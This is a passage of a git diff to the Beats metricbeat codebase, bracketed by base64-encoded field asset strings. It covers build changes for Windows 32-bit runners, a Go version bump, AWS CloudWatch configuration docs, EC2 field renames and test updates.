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" } diff --git a/x-pack/libbeat/Dockerfile b/x-pack/libbeat/Dockerfile index 1a0c44db3986..935a38c83651 100644 --- a/x-pack/libbeat/Dockerfile +++ b/x-pack/libbeat/Dockerfile @@ -1,4 +1,4 @@ -FROM golang:1.15.7 +FROM golang:1.15.8 RUN \ apt-get update \ diff --git a/x-pack/metricbeat/Jenkinsfile.yml b/x-pack/metricbeat/Jenkinsfile.yml index 90dcd4ca5602..08aaa1d6fc0f 100644 --- a/x-pack/metricbeat/Jenkinsfile.yml +++ b/x-pack/metricbeat/Jenkinsfile.yml @@ -75,7 +75,12 @@ stages: mage: "mage build unitTest" platforms: ## override default labels in this specific stage. - "windows-7" -# windows-7-32: -# mage: "mage build unitTest" -# platforms: ## override default labels in this specific stage. -# - "windows-7-32-bit" + windows-7-32: + mage: "mage build unitTest" + platforms: ## override default labels in this specific stage. + - "windows-7-32-bit" + packaging-linux: + packaging-linux: "mage package" + e2e: + enabled: false + entrypoint: 'metricbeat-test.sh' diff --git a/x-pack/metricbeat/cmd/root.go b/x-pack/metricbeat/cmd/root.go index de67f5f37993..c1822a428b8c 100644 --- a/x-pack/metricbeat/cmd/root.go +++ b/x-pack/metricbeat/cmd/root.go @@ -31,7 +31,7 @@ const ( Name = "metricbeat" // ecsVersion specifies the version of ECS that this beat is implementing. - ecsVersion = "1.7.0" + ecsVersion = "1.8.0" ) // RootCmd to handle beats cli diff --git a/x-pack/metricbeat/magefile.go b/x-pack/metricbeat/magefile.go index 4f15998df174..0771209d0972 100644 --- a/x-pack/metricbeat/magefile.go +++ b/x-pack/metricbeat/magefile.go @@ -9,10 +9,14 @@ package main import ( "context" "fmt" + "log" "os" + "runtime" + "strings" "time" "github.com/magefile/mage/mg" + "github.com/magefile/mage/sh" devtools "github.com/elastic/beats/v7/dev-tools/mage" metricbeat "github.com/elastic/beats/v7/metricbeat/scripts/mage" @@ -22,8 +26,6 @@ import ( // mage:import _ "github.com/elastic/beats/v7/dev-tools/mage/target/compose" // mage:import - "github.com/elastic/beats/v7/dev-tools/mage/target/unittest" - // mage:import "github.com/elastic/beats/v7/dev-tools/mage/target/test" // mage:import _ "github.com/elastic/beats/v7/metricbeat/scripts/mage/target/metricset" @@ -31,7 +33,6 @@ import ( func init() { common.RegisterCheckDeps(Update) - unittest.RegisterPythonTestDeps(Fields) test.RegisterDeps(IntegTest) devtools.BeatDescription = "Metricbeat is a lightweight shipper for metrics." @@ -40,13 +41,23 @@ func init() { // Build builds the Beat binary. func Build() error { - return devtools.Build(devtools.DefaultBuildArgs()) + args := devtools.DefaultBuildArgs() + // On Windows 7 32-bit we run out of memory if we enable DWARF + if isWindows32bitRunner() { + args.LDFlags = append(args.LDFlags, "-w") + } + return devtools.Build(args) } // GolangCrossBuild build the Beat binary inside of the golang-builder. // Do not use directly, use crossBuild instead. func GolangCrossBuild() error { - return devtools.GolangCrossBuild(devtools.DefaultGolangCrossBuildArgs()) + args := devtools.DefaultGolangCrossBuildArgs() + // On Windows 7 32-bit we run out of memory if we enable DWARF + if isWindows32bitRunner() { + args.LDFlags = append(args.LDFlags, "-w") + } + return devtools.GolangCrossBuild(args) } // CrossBuild cross-builds the beat for all target platforms. @@ -64,6 +75,64 @@ func CrossBuildGoDaemon() error { return devtools.CrossBuildGoDaemon() } +// UnitTest executes the unit tests (Go and Python). +func UnitTest() { + mg.SerialDeps(GoUnitTest, PythonUnitTest) +} + +// GoUnitTest executes the Go unit tests. +// Use TEST_COVERAGE=true to enable code coverage profiling. +// Use RACE_DETECTOR=true to enable the race detector. +func GoUnitTest(ctx context.Context) error { + args := devtools.DefaultGoTestUnitArgs() + // On Windows 7 32-bit we run out of memory if we enable DWARF + if isWindows32bitRunner() { + args.ExtraFlags = append(args.ExtraFlags, "-ldflags=-w") + } + return devtools.GoTest(ctx, args) +} + +// PythonUnitTest executes the python system tests. +func PythonUnitTest() error { + mg.SerialDeps(Fields) + mg.Deps(BuildSystemTestBinary) + + args := devtools.DefaultPythonTestUnitArgs() + // On Windows 32-bit converage is not enabled. + if isWindows32bitRunner() { + args.Env["TEST_COVERAGE"] = "false" + } + return devtools.PythonTest(args) +} + +// BuildSystemTestBinary build a system test binary depending on the runner. +func BuildSystemTestBinary() error { + binArgs := devtools.DefaultTestBinaryArgs() + args := []string{ + "test", "-c", + "-o", binArgs.Name + ".test", + } + + // On Windows 7 32-bit we run out of memory if we enable coverage and DWARF + isWin32Runner := isWindows32bitRunner() + if isWin32Runner { + args = append(args, "-ldflags=-w") + } + if devtools.TestCoverage && !isWin32Runner { + args = append(args, "-coverpkg", "./...") + } + + if len(binArgs.InputFiles) > 0 { + args = append(args, binArgs.InputFiles...) + } + + start := time.Now() + defer func() { + log.Printf("BuildSystemTestGoBinary (go %v) took %v.", strings.Join(args, " "), time.Since(start)) + }() + return sh.RunV("go", args...) +} + // Package packages the Beat for distribution. // Use SNAPSHOT=true to build snapshots. // Use PLATFORMS to control the target platforms. @@ -138,7 +207,7 @@ func IntegTest() { } // GoIntegTest executes the Go integration tests. -// Use TEST_COVERAGE=true to enable code coverage profiling. +// Use TEST_COVERAGE=true to enable code coverage profiling if not running on Windows 7 32bit. // Use RACE_DETECTOR=true to enable the race detector. // Use TEST_TAGS=tag1,tag2 to add additional build tags. // Use MODULE=module to run only tests for `module`. @@ -163,7 +232,16 @@ func PythonIntegTest(ctx context.Context) error { return err } return runner.Test("pythonIntegTest", func() error { - mg.Deps(devtools.BuildSystemTestBinary) - return devtools.PythonTest(devtools.DefaultPythonTestIntegrationArgs()) + mg.Deps(BuildSystemTestBinary) + args := devtools.DefaultPythonTestIntegrationArgs() + // On Windows 32-bit converage is not enabled. + if isWindows32bitRunner() { + args.Env["TEST_COVERAGE"] = "false" + } + return devtools.PythonTest(args) }) } + +func isWindows32bitRunner() bool { + return runtime.GOOS == "windows" && runtime.GOARCH == "386" +} diff --git a/x-pack/metricbeat/metricbeat.reference.yml b/x-pack/metricbeat/metricbeat.reference.yml index 39e66be15e73..50127225c63e 100644 --- a/x-pack/metricbeat/metricbeat.reference.yml +++ b/x-pack/metricbeat/metricbeat.reference.yml @@ -79,6 +79,9 @@ metricbeat.modules: period: 10s processes: ['.*'] + # Configure the mount point of the host’s filesystem for use in monitoring a host from within a container + #system.hostfs: "/hostfs" + # Configure the metric types that are included by these metricsets. cpu.metrics: ["percentages","normalized_percentages"] # The other available option is ticks. core.metrics: ["percentages"] # The other available option is ticks. diff --git a/x-pack/metricbeat/module/appsearch/_meta/docs.asciidoc b/x-pack/metricbeat/module/appsearch/_meta/docs.asciidoc index ad54a5fb233b..fbb0016ce3c3 100644 --- a/x-pack/metricbeat/module/appsearch/_meta/docs.asciidoc +++ b/x-pack/metricbeat/module/appsearch/_meta/docs.asciidoc @@ -1,2 +1,6 @@ This is the App Search module. +[NOTE] +===== +This module does not support collecting data from App Search running on {ecloud}. +===== \ No newline at end of file diff --git a/x-pack/metricbeat/module/aws/cloudwatch/_meta/docs.asciidoc b/x-pack/metricbeat/module/aws/cloudwatch/_meta/docs.asciidoc index a66f13acd6a9..ae8bca398cad 100644 --- a/x-pack/metricbeat/module/aws/cloudwatch/_meta/docs.asciidoc +++ b/x-pack/metricbeat/module/aws/cloudwatch/_meta/docs.asciidoc @@ -99,6 +99,38 @@ will get lost. Metrics from namespace AWS/Billing are sent to Cloudwatch every several hours. By querying from AWS/Billing namespace every 300 seconds, additional costs will occur. +[float] +==== Example 3 +Depends on the configuration and number of services in the AWS account, the number +of API calls may get too big to cause high API cost. In order to reduce the number +of API calls, we recommend users to use this configuration below as an example. + +* *metrics.name*: Only collect a sub list of metrics that are useful to your use case. +* *metrics.statistic*: By default, cloudwatch metricset will make API calls to +get all stats like average, max, min, sum and etc. If the user knows which +statistics method is most useful, specify it in the configuration. +* *metrics.dimensions*: Different AWS services report different dimensions in their +CloudWatch metrics. For example, https://docs.aws.amazon.com/emr/latest/ManagementGuide/UsingEMR_ViewingMetrics.html[EMR metrics] +can have either `JobFlowId` dimension or `JobId` dimension. If user knows which +specific dimension is useful, it can be specified in this configuration option. + +[source,yaml] +---- +- module: aws + period: 5m + metricsets: + - cloudwatch + regions: us-east-1 + metrics: + - namespace: AWS/ElasticMapReduce + name: ["S3BytesWritten", "S3BytesRead", "HDFSUtilization", "TotalLoad"] + resource_type: elasticmapreduce + statistic: ["Average"] + dimensions: + - name: JobId + value: "*" +---- + [float] === More examples With the configuration below, users will be able to collect cloudwatch metrics diff --git a/x-pack/metricbeat/module/aws/cloudwatch/cloudwatch_integration_test.go b/x-pack/metricbeat/module/aws/cloudwatch/cloudwatch_integration_test.go index c99c6acb40c2..f2a136c36a32 100644 --- a/x-pack/metricbeat/module/aws/cloudwatch/cloudwatch_integration_test.go +++ b/x-pack/metricbeat/module/aws/cloudwatch/cloudwatch_integration_test.go @@ -27,6 +27,7 @@ func TestFetch(t *testing.T) { } assert.NotEmpty(t, events) + mbtest.TestMetricsetFieldsDocumented(t, metricSet, events) } func TestData(t *testing.T) { diff --git a/x-pack/metricbeat/module/aws/ec2/_meta/fields.yml b/x-pack/metricbeat/module/aws/ec2/_meta/fields.yml index c7280fce9981..7862ff75ea37 100644 --- a/x-pack/metricbeat/module/aws/ec2/_meta/fields.yml +++ b/x-pack/metricbeat/module/aws/ec2/_meta/fields.yml @@ -76,19 +76,19 @@ type: scaled_float description: > Bytes written per second to all instance store volumes available to the instance. - - name: diskio.read.ops + - name: diskio.read.count type: long description: > Total completed read operations from all instance store volumes available to the instance in collection period. - - name: diskio.read.ops_per_sec + - name: diskio.read.count_per_sec type: long description: > Completed read operations per second from all instance store volumes available to the instance in a specified period of time. - - name: diskio.write.ops + - name: diskio.write.count type: long description: > Total completed write operations to all instance store volumes available to the instance in collection period. - - name: diskio.write.ops_per_sec + - name: diskio.write.count_per_sec type: long description: > Completed write operations per second to all instance store volumes available to the instance in a specified period of time. diff --git a/x-pack/metricbeat/module/aws/ec2/ec2_integration_test.go b/x-pack/metricbeat/module/aws/ec2/ec2_integration_test.go index 121df878b278..d790140d7e79 100644 --- a/x-pack/metricbeat/module/aws/ec2/ec2_integration_test.go +++ b/x-pack/metricbeat/module/aws/ec2/ec2_integration_test.go @@ -17,7 +17,6 @@ import ( ) func TestFetch(t *testing.T) { - t.Skip("flaky test: https://github.com/elastic/beats/issues/20951") config := mtest.GetConfigForTest(t, "ec2", "300s") metricSet := mbtest.NewReportingMetricSetV2Error(t, config) @@ -27,41 +26,7 @@ func TestFetch(t *testing.T) { } assert.NotEmpty(t, events) - - for _, event := range events { - // RootField - mtest.CheckEventField("service.name", "string", event, t) - mtest.CheckEventField("cloud.availability_zone", "string", event, t) - mtest.CheckEventField("cloud.provider", "string", event, t) - mtest.CheckEventField("cloud.instance.id", "string", event, t) - mtest.CheckEventField("cloud.machine.type", "string", event, t) - mtest.CheckEventField("cloud.provider", "string", event, t) - mtest.CheckEventField("cloud.region", "string", event, t) - mtest.CheckEventField("instance.image.id", "string", event, t) - mtest.CheckEventField("instance.state.name", "string", event, t) - mtest.CheckEventField("instance.state.code", "int", event, t) - mtest.CheckEventField("instance.monitoring.state", "string", event, t) - mtest.CheckEventField("instance.core.count", "int", event, t) - mtest.CheckEventField("instance.threads_per_core", "int", event, t) - - // MetricSetField - mtest.CheckEventField("cpu.total.pct", "float", event, t) - mtest.CheckEventField("cpu.credit_usage", "float", event, t) - mtest.CheckEventField("cpu.credit_balance", "float", event, t) - mtest.CheckEventField("cpu.surplus_credit_balance", "float", event, t) - mtest.CheckEventField("cpu.surplus_credits_charged", "float", event, t) - mtest.CheckEventField("network.in.packets", "float", event, t) - mtest.CheckEventField("network.out.packets", "float", event, t) - mtest.CheckEventField("network.in.bytes", "float", event, t) - mtest.CheckEventField("network.out.bytes", "float", event, t) - mtest.CheckEventField("diskio.read.bytes", "float", event, t) - mtest.CheckEventField("diskio.write.bytes", "float", event, t) - mtest.CheckEventField("diskio.read.ops", "float", event, t) - mtest.CheckEventField("diskio.write.ops", "float", event, t) - mtest.CheckEventField("status.check_failed", "int", event, t) - mtest.CheckEventField("status.check_failed_system", "int", event, t) - mtest.CheckEventField("status.check_failed_instance", "int", event, t) - } + mbtest.TestMetricsetFieldsDocumented(t, metricSet, events) } func TestData(t *testing.T) { diff --git a/x-pack/metricbeat/module/aws/fields.go b/x-pack/metricbeat/module/aws/fields.go index 31a766459c73..f63e476ad077 100644 --- a/x-pack/metricbeat/module/aws/fields.go +++ b/x-pack/metricbeat/module/aws/fields.go @@ -19,5 +19,5 @@ func init() { // AssetAws returns asset data. // This is the base64 encoded gzipped contents of module/aws. func AssetAws() string { - return "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